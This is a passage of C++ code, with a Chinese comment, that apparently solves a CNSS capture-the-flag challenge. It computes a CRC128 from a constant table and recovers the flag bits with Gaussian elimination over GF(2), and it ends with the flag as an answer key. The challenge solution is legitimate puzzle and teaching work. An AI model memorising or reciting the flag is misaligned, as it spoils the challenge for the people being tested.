,0x6E,0x0D5,0x5C,0x91,0x9,0x0A3,0x67,0x69,0x0A7,0x0E8,0x2B,0x21,0x0EA,0x69,0x82,0x57
,0x24,0x7E,0x44,0x5E,0x0DC,0x3,0x1A,0x0B4,0x6F,0x5F,0x27,0x0CF,0x48,0x1C,0x91,0x1A
,0x0B3,0x7F,0x0E5,0x0B3,0x1A,0x0E5,0x0A8,0x0BB,0x0E9,0x39,0x7C,0x63,0x3E,0x0BA,0x86,0x0F8
,0x0B0,0x28,0x75,0x0C0,0x77,0x42,0x0E1,0x0E,0x0FE,0x30,0x3E,0x13,0x0D,0x0F7,0x0B7,0x80
,0x27,0x29,0x0D4,0x2D,0x0B1,0x0A4,0x53,0x1,0x78,0x56,0x65,0x0BF,0x7B,0x51,0x0A0,0x62
,0x6D,0x82,0x0CC,0x0E2,0x64,0x4,0x2E,0x0DC,0x0B0,0x0E1,0x69,0x51,0x0D9,0x24,0x0B3,0x2F
,0x0FA,0x83,0x6D,0x0F,0x0A2,0x0E2,0x9C,0x0D3,0x36,0x87,0x32,0x0FD,0x0AF,0x82,0x0A4,0x0CD
,0x6B,0x2C,0x0EC,0x5,0x0BE,0x4A,0x0BD,0x0B6,0x9F,0x0F3,0x0ED,0x0B1,0x0BF,0x0BE,0x0D1,0x0DF
,0x0FC,0x2D,0x4D,0x0E8,0x78,0x0AC,0x0F,0x0B9,0x19,0x95,0x0B6,0x1D,0x0C9,0x18,0x0C6,0x3D
,0x0B6,0x86,0x55,0x27,0x0AD,0x0C,0x72,0x64,0x0D1,0x22,0x0BA,0x0F3,0x6B,0x6D,0x0D5,0x70
,0x21,0x87,0x0F4,0x0CA,0x6B,0x0EA,0x0C0,0x6B,0x57,0x44,0x0E1,0x5F,0x1D,0x0CB,0x0C2,0x92
,0x22,0x0D0,0x64,0x0B9,0x6,0x4D,0x89,0x0DE,0x40,0x4D,0x0A3,0x2F,0x2E,0x86,0x0F3,0x0EA
,0x0B5,0x0D1,0x0C5,0x54,0x0C0,0x0AB,0x3B,0x0D1,0x0C6,0x2B,0x0F8,0x83,0x58,0x20,0x0E4,0x8
,0x0FF,0x7A,0x0DD,0x9B,0x15,0x0B,0x46,0x0C,0x0E,0x9C,0x0F4,0x6D,0x0FA,0x55,0x0F7,0x45
,0x68,0x7B,0x7C,0x76,0x0D3,0x0ED,0x0F4,0x3,0x88,0x0FA,0x0AF,0x0C1,0x8C,0x0F3,0x0E0,0x0A7
,0x0DD,0x25,0x0DE,0x8E,0x2D,0x5B,0x5,0x0C6,0x5C,0x75,0x4A,0x0F4,0x0DA,0x2D,0x1D,0x61
,0x4A,0x24,0x7F,0x63,0x0EB,0x0BD,0x0B7,0x0C9,0x0DA,0x13,0x11,0x58,0x0AC,0x8B,0x0A,0x83
,0x0,0x8F,0x67,0x0AC,0x3E,0x1D,0x0CA,0x14,0x12,0x0A4,0x1D,0x0B6,0x0E,0x0FE,0x19,0x0CE
,0x97,0x8E,0x0C6,0x41,0x0F8,0x0FB,0x78,0x1B,0x94,0x0C2,0x46,0x1A,0x78,0x58,0x0E,0x2C
,0x94,0x0D9,0x56,0x32,0x95,0x5C,0x31,0x0AE,0x83,0x0CB,0x4,0x6A,0x4B,0x15,0x3F,0x54
,0x3,0x0D8,0x0F7,0x0DF,0x53,0x0BA,0x83,0x0A1,0x5,0x0AD,0x5F,0x0C6,0x3D,0x0B3,0x28,0x0B6
,0x49,0x73,0x0EF,0x10,0x86,0x1A,0x0FE,0x7C,0x0CD,0x1A,0x53,0x28,0x9F,0x0C6,0x3B,0x0FB
,0x0DE,0x72,0x4E,0x0FD,0x40,0x0FC,0x4C,0x73,0x4B,0x7C,0x8,0x84,0x0E9,0x60,0x2C,0x19
,0x4F,0x0DD,0x0CF,0x0F7,0x5C,0x54,0x6D,0x16,0x0E2,0x8,0x0D7,0x0C8,0x0F9,0x5C,0x59,0x0B
,0x0D8,0x0DC,0x6E,0x1A,0x9A,0x0B2,0x0DF,0x19,0x64,0x6E,0x8C,0x64,0x8F,0x0FA,0x4E,0x0E9
,0x92,0x77,0x76,0x0D5,0x4F,0x12,0x0A2,0x0C4,0x0AC,0x0D9,0x80,0x8A,0x2D,0x8F,0x5D,0x0A4
,0x5,0x76,0x0D7,0x38,0x89,0x0F4,0x10,0x0CB,0x2A,0x0BF,0x0DB,0x26,0x5B,0x29,0x4A,0x46
,0x6,0x21,0x47,0x4B,0x0E4,0x53,0x59,0x7E,0x3D,0x0B6,0x99,0x56,0x68,0x64,0x7B,0x3E
,0x91,0x20,0x0E6,0x0A6,0x22,0x0B5,0x0EB,0x71,0x0BB,0x0D0,0x0C2,0x0FA,0x1E,0x0C2,0x6C,0x0DC
,0x0DB,0x8B,0x0FE,0x69,0x0F7,0x15,0x96,0x0AC,0x73,0x67,0x0CE,0x14,0x0BC,0x0B7,0x7F,0x91
,0x4C,0x8A,0x5F,0x84,0x31,0x0F3,0x24,0x0A3,0x0F5,0x1,0x95,0x0B8,0x0CA,0x11,0x68,0x73
,0x42,0x9F,0x41,0x61,0x94,0x0F3,0x0DF,0x0EA,0x98,0x64,0x0E4,0x65,0x29,0x94,0x0AF,0x77
,0x0D5,0x9E,0x0E0,0x8C,0x52,0x15,0x6D,0x0E5,0x1E,0x2,0x0BF,0x0C9,0x5F,0x32,0x0B8,0x95
,0x9F,0x35,0x0F8,0x43,0x87,0x0B5,0x10,0x38,0x0D6,0x0B5,0x0B3,0x27,0x0FD,0x47,0x0AB,0x0D8
,0x8,0x34,0x59,0x0AE,0x41,0x53,0x0A2,0x37,0x50,0x0D3,0x0E8,0x8B,0x8B,0x0E1,0x0BC,0x3A
,0x0B,0x63,0x0C9,0x0DD,0x2C,0x0F4,0x0EB,0x82,0x47,0x0DA,0x0AA,0x0FB,0x0B8,0x0AC,0x8D,0x42
,0x9C,0x62,0x68,0x30,0x0EA,0x12,0x59,0x8D,0x0C1,0x0BC,0x0F1,0x57,0x0CE,0x0A,0x9A,0x0A0
,0x0D6,0x0C9,0x70,0x0FF,0x3F,0x0B2,0x24,0x50,0x9,0x0B,0x0FD,0x0B9,0x6C,0x7F,0x89,0x0ED
,0x41,0x0C8,0x0D1,0x12,0x0F9,0x54,0x96,0x5F,0x8F,0x6D,0x0A6,0x15,0x1A,0x0D9,0x9E,0x0F
,0x0D0,0x67,0x50,0x18,0x0E5,0x0FC,0x0B7,0x3A,0x26,0x19,0x79,0x59,0x0A,0x0E5,0x0EB,0x1D
,0x47,0x66,0x0F1,0x0F5,0x23,0x1A,0x5,0x35,0x0A0,0x7F,0x22,0x0F5,0x7C,0x43,0x0FC,0x0FF
,0x0D,0x0CD,0x0E9,0x3A,0x0F6,0x0BA,0x78,0x0E8,0x68,0x0C8,0x2E,0x1B,0x0DE,0x36,0x0EF,0x0B2
,0x9A,0x0CC,0x48,0x0D7,0x30,0x5C,0x0CA,0x0E7,0x0EE,0x0AE,0x75,0x0B7,0x0A8,0x90,0x0F8,0x50
,0x99,0x9B,0x0D8,0x0A4,0x5D,0x0FB,0x83,0x52,0x0F9,0x0A7,0x37,0x0C7,0x9B,0x0DD,0x0C9,0x28
,0x0E,0x9A,0x79,0x49,0x9B,0x1D,0x31,0x5D,0x7F,0x0C1,0x6C,0x6B,0x0ED,0x7B,0x0DE,0x0CA
,0x44,0x31,0x61,0x86,0x4E,0x0BD,0x4C,0x80,0x0B7,0x76,0x60,0x85,0x4F,0x0E,0x0CD,0x87
,0x0D3,0x30,0x0C0,0x6B,0x88,0x5B,0x0FE,0x8F,0x31,0x10,0x3B,0x29,0x39,0x0A8,0x0DA,0x65
,0x66,0x6E,0x62,0x93,0x76,0x0ED,0x0F,0x4A,0x0E5,0x9F,0x0DE,0x1C,0x6F,0x76,0x27,0x0A3
,0x0F1,0x6F,0x0C3,0x7E,0x0B0,0x0B,0x0BD,0x45,0x63,0x0F9,0x85,0x0B0,0x19,0x0D0,0x30,0x41
,0x0BB,0x0C4,0x0DB,0x0B1,0x65,0x0AB,0x0C0,0x98,0x0AB,0x4E,0x89,0x5E,0x0BB,0x0A5,0x23,0x0C
,0x2C,0x0C5,0x7A,0x5C,0x0A3,0x4D,0x72,0x97,0x2D,0x28,0x0D2,0x0F2,0x0CD,0x3,0x34,0x0EE
,0x2F,0x92,0x0EA,0x2F,0x0CE,0x0EA,0x3B,0x22,0x3A,0x21,0x90,0x82,0x0FE,0x4E,0x5,0x96
,0x0B8,0x93,0x4B,0x0C2,0x8,0x0C,0x89,0x2D,0x0BC,0x47,0x0CB,0x2E,0x88,0x0E8,0x12,0x74
,0x0F2,0x38,0x53,0x0D,0x0DD,0x0AC,0x0F4,0x0F0,0x74,0x0F0,0x0C7,0x0C0,0x2A,0x9D,0x1,0x39
,0x65,0x39,0x0F2,0x0E0,0x1B,0x4A,0x46,0x0FF,0x0F2,0x96,0x9C,0x6C,0x5C,0x3B,0x16,0x0DB
,0x0F4,0x96,0x73,0x0EA,0x7,0x0E2,0x67,0x9A,0x5B,0x0E2,0x43,0x20,0x4C,0x7,0x63,0x0C9
,0x63,0x97,0x0D2,0x7,0x0C1,0x4,0x0D5,0x95,0x0DD,0x84,0x18,0x8C,0x3A,0x0A1,0x74,0x2B
,0x29,0x3C,0x0CA,0x0C8,0x14,0x0A4,0x0A8,0x48,0x15,0x33,0x14,0x62,0x98,0x0D4,0x67,0x66
,0x0BE,0x3D,0x6B,0x25,0x0D2,0x42,0x1A,0x47,0x93,0x55,0x4F,0x0CE,0x0EE,0x72,0x70,0x84
,0x0BD,0x6A,0x0FB,0x56,0x0BF,0x0E5,0x53,0x0F2,0x84,0x5C,0x0D,0x0BE,0x0DD,0x3F,0x41,0x0FC
,0x2A,0x6B,0x5A,0x0BB,0x79,0x3,0x0E1,0x0FD,0x2,0x3A,0x56,0x12,0x0AB,0x99,0x56,0x1E
,0x60,0x0C0,0x42,0x74,0x0AC,0x0A3,0x9C,0x20,0x0CA,0x8D,0x5A,0x0FC,0x9,0x0EC,0x45,0x53
,0x0F7,0x0C1,0x0E3,0x99,0x6A,0x45,0x2E,0x2F,0x4C,0x0EB,0x1,0x50,0x7F,0x4A,0x52,0x0B1
,0x7C,0x0EA,0x7E,0x0BE,0x0E7,0x0A2,0x6A,0x0B3,0x10,0x47,0x0B8,0x46,0x0CE,0x0E7,0x0CA,0x5A
,0x0EB,0x0EB,0x0DF,0x53,0x21,0x44,0x0D8,0x0BC,0x96,0x21,0x0E3,0x0EA,0x0B8,0x41,0x0DD,0x0B8
,0x0A1,0x40,0x0C7,0x9C,0x0F4,0x0E4,0x0A5,0x61,0x5E,0x96,0x0EF,0x4,0x1A,0x34,0x0CE,0x0F5
,0x36,0x41,0x66,0x71,0x32,0x2,0x17,0x6E,0x0D8,0x0F0,0x0B4,0x0A8,0x6C,0x92,0x0D9,0x17
,0x35,0x16,0x0F6,0x2,0x5F,0x0A5,0x5E,0x0DB,0x0CF,0x0F9,0x0F6,0x0D8,0x5F,0x0DF,0x0E8,0x6F
,0x0A2,0x17,0x57,0x0EF,0x99,0x43,0x0EC,0x0D4,0x49,0x9F,0x0AD,0x74,0x29,0x79,0x0FF,0x8D
,0x0E8,0x0BC,0x4F,0x20,0x4C,0x0E3,0x91,0x9,0x81,0x28,0x0A1,0x9A,0x8B,0x0C,0x0EC,0x0C0
,0x7F,0x0BD,0x0EE,0x0CD,0x8A,0x5,0x23,0x6,0x7,0x4E,0x0FA,0x36,0x0FD,0x0AA,0x0FB,0x22
,0x0EE,0x12,0x6F,0x0C7,0x96,0x0AD,0x2,0x63,0x0AE,0x3A,0x25,0x7A,0x0ED,0x96,0x8E,0x30
,0x79,0x13,0x0CE,0x2A,0x50,0x4B,0x0B0,0x6C,0x28,0x5C,0x7E,0x0D6,0x9B,0x30,0x99,0x0D2
,0x33,0x0B8,0x0D6,0x0E5,0x85,0x0EB,0x0CD,0x0B1,0x0E0,0x0EB,0x72,0x38,0x39,0x45,0x8A,0x9F
,0x0A4,0x0B9,0x77,0x8,0x43,0x0D,0x7F,0x0BE,0x66,0x8D,0x29,0x94,0x4F,0x0E3,0x9D,0x7D
,0x0A7,0x0EE,0x0E7,0x7B,0x2E,0x0AA,0x36,0x0B,0x71,0x84,0x6B,0x0E4,0x7C,0x0AE,0x0AC,0x5
,0x30,0x0EF,0x46,0x96,0x0E8,0x4C,0x84,0x4,0x0F7,0x0E2,0x30,0x48,0x0A,0x8,0x0BB,0x0E7
,0x7A,0x44,0x5E,0x59,0x3D,0x0EC,0x0F9,0x0D9,0x3F,0x55,0x3C,0x0A6,0x0A8,0x7D,0x0A8,0x0AA
,0x0ED,0x45,0x0FF,0x0B4,0x0FB,0x0A,0x4B,0x0D6,0x0B9,0x33,0x67,0x0A,0x0DE,0x0DB,0x0BF,0x48
,0x58,0x1B,0x5D,0x4C,0x5,0x0BC,0x0BA,0x13,0x6D,0x0BC,0x82,0x3F,0x88,0x5,0x42,0x8E
,0x0CF,0x1A,0x0FC,0x0A1,0x0C3,0x5A,0x8,0x1C,0x0EB,0x0DA,0x0D9,0x93,0x0FE,0x0A3,0x55,0x6C
,0x85,0x0B1,0x0E4,0x6E,0x16,0x0FA,0x75,0x0C1,0x23,0x6D,0x0D5,0x7D,0x5C,0x0D6,0x46,0x21
,0x12,0x0B0,0x45,0x83,0x0D0,0x1C,0x0C7,0x0CE,0x0A5,0x0B,0x8E,0x0D1,0x2A,0x70,0x51,0x0C3
,0x11,0x0E7,0x0D5,0x0F0,0x0BD,0x0BB,0x8E,0x7B,0x0B2,0x2,0x0CC,0x0A1,0x19,0x3D,0x60,0x0BB
,0x86,0x0E6,0x74,0x1D,0x7B,0x5D,0x3C,0x74,0x34,0x64,0x97,0x0D,0x6F,0x9B,0x77,0x59
,0x0CC,0x4D,0x6C,0x0D2,0x0AE,0x0FD,0x41,0x0A9,0x0FC,0x0D3,0x9B,0x0E3,0x0CD,0x0EE,0x64,0x14
,0x5B,0x4C,0x0CD,0x3F,0x68,0x1B,0x0F3,0x0A6,0x7A,0x0B5,0x0C0,0x4F,0x0BB,0x48,0x73,0x0F6
,0x0CA,0x0E3,0x4C,0x35,0x74,0x0B3,0x0D2,0x0C3,0x0D3,0x0C1,0x1F,0x3,0x0AB,0x74,0x6,0x0E4
,0x5D,0x0E2,0x0ED,0x0D8,0x0B2,0x55,0x60,0x0CC,0x55,0x0A7,0x44,0x0AF,0x0DD,0x0D2,0x11,0x6
,0x17,0x49,0x0F5,0x17,0x67,0x0F5,0x1D,0x11,0x9D,0x10,0x48,0x41,0x7F,0x0A7,0x2,0x4B
,0x80,0x48,0x54,0x0FA,0x0A1,0x13,0x0AF,0x1E,0x1B,0x76,0x13,0x0ED,0x9,0x1,0x15,0x0A9
,0x83,0x1F,0x0C4,0x89,0x0CC,0x0B4,0x0E6,0x0AB,0x0C,0x7F,0x51,0x9D,0x3A,0x4C,0x24,0x0D1
,0x14,0x1E,0x65,0x64,0x0A,0x52,0x54,0x0A4,0x8A,0x19,0x0A,0x31,0x4C,0x0EA,0x33,0x33
,0x5E,0x0B5,0x7D,0x0AB,0x0DF,0x0F2,0x29,0x79,0x42,0x0AE,0x6,0x0DF,0x0EE,0x9F,0x20,0x7E
,0x0C9,0x0B4,0x0DC,0x46,0x19,0x14,0x9B,0x76,0x0C4,0x0C8,0x5D,0x73,0x98,0x39,0x37,0x9C
,0x0C7,0x0A1,0x0C2,0x0A3,0x0BC,0x14,0x60,0x3F,0x0A9,0x0AD,0x2C,0x0AE,0x7B,0x0BC,0x0F0,0x98
,0x50,0x0A0,0x63,0x4E,0x7A,0x0F2,0x0D2,0x30,0x2F,0x0CB,0x77,0x2,0x0D,0x1A,0x0E7,0x7A
,0x1A,0x0B,0x7B,0x81,0x0AF,0x52,0x0AF,0x0ED,0x0E7,0x7C,0x7B,0x0EC,0x0AF,0x6F,0x0F4,0x37
,0x8D,0x0A,0x0DA,0x6C,0x69,0x0B4,0x1D,0x0E2,0x61,0x1A,0x20,0x40,0x0D9,0x0C9,0x0E3,0x0D5
,0x8E,0x5D,0x4A,0x1F,0x4,0x13,0x54,0x57,0x76,0x13,0x62,0x30,0x0EA,0x84,0x0D2,0x0AD
,0x19,0x5C,0x0EB,0x0F2,0x0C2,0x0F5,0x0E6,0x58,0x0F0,0x75,0x39,0x9C,0x9C,0x22,0x0C5,0x4F
,0x53,0x0F7,0x0F3,0x3D,0x17,0x55,0x9B,0x85,0x38,0x0C2,0x35,0x72,0x3E,0x57,0x0D6,0x2
,0x0C4,0x0F6,0x52,0x0D0,0x0D1,0x0B3,0x29,0x8A,0x0BE,0x0A4,0x6E,0x0DE,0x48,0x0F1,0x0C1,0x0E0
,0x55,0x59,0x0D3,0x0DA,0x0CD,0x1B,0x8,0x0EF,0x17,0x0D0,0x0B1,0x92,0x58,0x0CD,0x0B4,0x0F2
,0x0C2,0x58,0x72,0x37,0x0B,0x0FD,0x0BA,0x0E0,0x91,0x0B6,0x0EA,0x3E,0x2E,0x6B,0x0A3,0x10
,0x88,0x0F3,0x6A,0x0F8,0x0DE,0x5D,0x0C7,0x3D,0x59,0x1,0x0E6,0x0D0,0x8C,0x1E,0x0B0,0x5D
,0x1F,0x0F2,0x0CB,0x15,0x18,0x0BB,0x75,0x32,0x0DF,0x67,0x0BD,0x7C,0x0FA,0x0B8,0x0A7,0x0BF
,0x1C,0x0A5,0x5B,0x66,0x75,0x1C,0x3C,0x87,0x0C8,0x6E,0x0FF,0x0C,0x0C9,0x0F5,0x96,0x0C7
,0x8B,0x0A4,0x0FA,0x8B,0x0B3,0x0FA,0x8E,0x88,0x4E,0x8,0x0A4,0x0A0,0x0BF,0x53,0x81,0x25
,0x0C1,0x0F,0x0E2,0x44,0x66,0x5A,0x0F3,0x55,0x86,0x0BF,0x0A8,0x4E,0x1D,0x26,0x92,0x68
,0x56,0x0E,0x43,0x0A9,0x0A0,0x0BC,0x41,0x5A,0x0,0x0D9,0x0F3,0x0E2,0x6B,0x80,0x85,0x8A
,0x0E3,0x50,0x0E1,0x51,0x5E,0x0A,0x0B0,0x9F,0x0D4,0x56,0x16,0x0D7,0x3D,0x5E,0x78,0x4C
,0x74,0x51,0x40,0x0BC,0x98,0x0EC,0x2,0x90,0x52,0x30,0x4D,0x7B,0x4B,0x0F8,0x6F,0x0AE
,0x3E,0x0FA,0x58,0x73,0x4D,0x4C,0x7F,0x4D,0x9A,0x87,0x41,0x95,0x0E9,0x8D,0x7C,0x0E3
,0x0A9,0x0FB,0x0F9,0x9E,0x8B,0x0AA,0x0CD,0x42,0x1C,0x0E1,0x1A,0x39,0x9F,0x2B,0x6B,0x1
,0x0AA,0x0AC,0x69,0x0ED,0x0E6,0x0D,0x84,0x0F7,0x0B,0x0E8,0x58,0x49,0x0AC,0x66,0x5A,0x79
,0x3D,0x0AD,0x0C8,0x0,0x20,0x0EB,0x36,0x0F8,0x8D,0x8E,0x3,0x0E5,0x0DA,0x0C0,0x4D,0x9B
,0x77,0x6,0x0D0,0x0CF,0x0F5,0x4B,0x4B,0x25,0x45,0x39,0x0F,0x0B,0x78,0x0B5,0x5E,0x0D6
,0x0E0,0x7,0x71,0x22,0x33,0x0AD,0x0F9,0x2A,0x0C3,0x5F,0x54,0x0A7,0x0E,0x13,0x49,0x34
,0x71,0x0A8,0x0F0,0x28,0x2F,0x5,0x0D8,0x4F,0x6A,0x2B,0x8B,0x0EB,0x1E,0x2F,0x3C,0x26
,0x0E6,0x0A9,0x51,0x0C5,0x0E9,0x0E3,0x6A,0x40,0x0EC,0x4D,0x0D0,0x47,0x68,0x89,0x2B,0x0C4
,0x0AC,0x2,0x49,0x0A,0x3C,0x43,0x17,0x9D,0x24,0x0FA,0x0DC,0x0A9,0x0CA,0x0FC,0x38,0x89
,0x3B,0x3,0x0E8,0x0E7,0x0FA,0x0A5,0x0A5,0x92,0x0A2,0x9C,0x87,0x5,0x0BC,0x5A,0x2F,0x6B
,0x38,0x54,0x78,0x94,0x97,0x2,0x0EC,0x27,0x0B5,0x95,0x0C5,0x75,0x8F,0x17,0x1E,0x13
,0x0AF,0x55,0x0D9,0x79,0x51,0x0E4,0x5E,0x28,0x33,0x0F3,0x9E,0x0D9,0x0F9,0x0B1,0x9,0x0F1
,0x0E5,0x0FE,0x0C1,0x0B6,0x84,0x44,0x23,0x0F5,0x0FB,0x44,0x92,0x37,0x5B,0x0C4,0x1A,0x0BC
,0x72,0x0FF,0x60,0x5B,0x42,0x0A2,0x91,0x0FA,0x7D,0x22,0x0C9,0x9B,0x2D,0x62,0x0D,0x5E };
上边是计算CRC128时用到的常量表,因为太长了所以单独取出来折叠一下,核心求解代码在下边
#define _CRT_SECURE_NO_WARNINGS
#include <cstdio>
#include <cstdlib>
#include <string>
#include <iostream>
using namespace std;
unsigned char xcode[16];
unsigned char input[] = "cnss{\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0}";
string flip[128];
string crc[128];
string inputstr[128];
string noflip;
char buf[30];
char buf2[30];
int a[128][128+1],n=128,ans[128];
int table[128*128];
int noflipbin[128];
int mktable()
{
//printf("%d\n", sizeof(key));
for (int i = 0; i < 16; i++) input[5 + i] = 0x00;
for (int i = 0; i < 16; i++) xcode[i] = 0xFF;
for (int i = 0; i < 22; i++)
{
int idx = input[i] ^ xcode[0];
for (int j = 0; j < 15; j++) xcode[j] = xcode[j + 1];
xcode[15] = 0;
for (int j = 0; j < 16; j++) xcode[j] ^= key[idx * 16 + j];
}
for (int i = 0; i < 16; i++)
{
_itoa(xcode[i], buf, 2);
sprintf(buf2, "%08s", buf);
noflip += buf2;
}
for (int i=0;i<128;i++) noflipbin[i]=noflip[i]-'0';
cout << noflip << endl;
for (int f=0;f<128;f++)
{
int cnt = f;
for (int i = 0; i < 16; i++)
{
unsigned int bt=0;
for (int j = 0; j < 8; j++) { bt = (bt << 1) + (cnt == 0 ? 1 : 0); cnt--; }
input[5 + i] = bt;
}
inputstr[f] = "";
for (int i = 0; i < 16; i++)
{
_itoa(input[5 + i], buf, 2);
sprintf(buf2, "%08s", buf);
inputstr[f] += buf2;
}
for (int i = 0; i < 16; i++) xcode[i] = 0xFF;
for (int i = 0; i < 22; i++)
{
int idx = input[i] ^ xcode[0];
for (int j = 0; j < 15; j++) xcode[j] = xcode[j + 1];
xcode[15] = 0;
for (int j = 0; j < 16; j++) xcode[j] ^= key[idx * 16 + j];
}
for (int i = 0; i < 16; i++)
{
_itoa(xcode[i], buf, 2);
sprintf(buf2,"%08s", buf);
crc[f] += buf2;
}
for (int i = 0; i < 128; i++)
{
flip[f] += (((crc[f][i] == noflip[i]) ? '0' : '1') == inputstr[f][i]) ? "0" : "1";
table[f*128+i] = (((crc[f][i] == noflip[i]) ? '0' : '1') == inputstr[f][i]) ? 0 : 1;
}
cout << flip[f] << endl;
}
}
void gauss()
{
for(int i=0;i<n;i++)
{
int j=i;
while(j<n&&!a[j][i])j++;
if(j>=n)continue;
if(i!=j)for(int k=0;k<n+1;k++)swap(a[i][k],a[j][k]);
for(int j=0;j<n;j++)
if(i!=j&&a[j][i])
for(int k=0;k<n+1;k++)
a[j][k]^=a[i][k];
}
}
void dfs(int now)
{
if(now<0)
{
printf("cnss{");
for (int i=0;i<16;i++)
{
int t=0;
for (int j=0;j<8;j++)
t=t*2+ans[i*8+j];
printf("%02x",t);
}
printf("}");
printf("\n");
for (int i=0;i<n;i++) printf("%d,",ans[i]);
printf("\n");
return;
}
if(a[now][now])
{
int t=a[now][n];
for(int i=now+1;i<n;i++)
if(a[now][i]) t^=ans[i];
ans[now]=t;
dfs(now-1);
}
else
{
ans[now]=1;dfs(now-1);
ans[now]=0;dfs(now-1);
}
}
int xorsolve()
{
for (int i=0;i<n;i++)
{
for (int j=0;j<n;j++) a[i][j]=table[128*j+i];
a[i][n]=noflipbin[i];
}
gauss();
for(int i=0;i<n;i++)
{
for(int j=0;j<n+1;j++)
printf("%d ",a[i][j]);
printf("\n");
}
dfs(n-1);
}
int main()
{
mktable();
xorsolve();
}
//cnss{39e77cc4d9a23eed051bb30029bff4f0}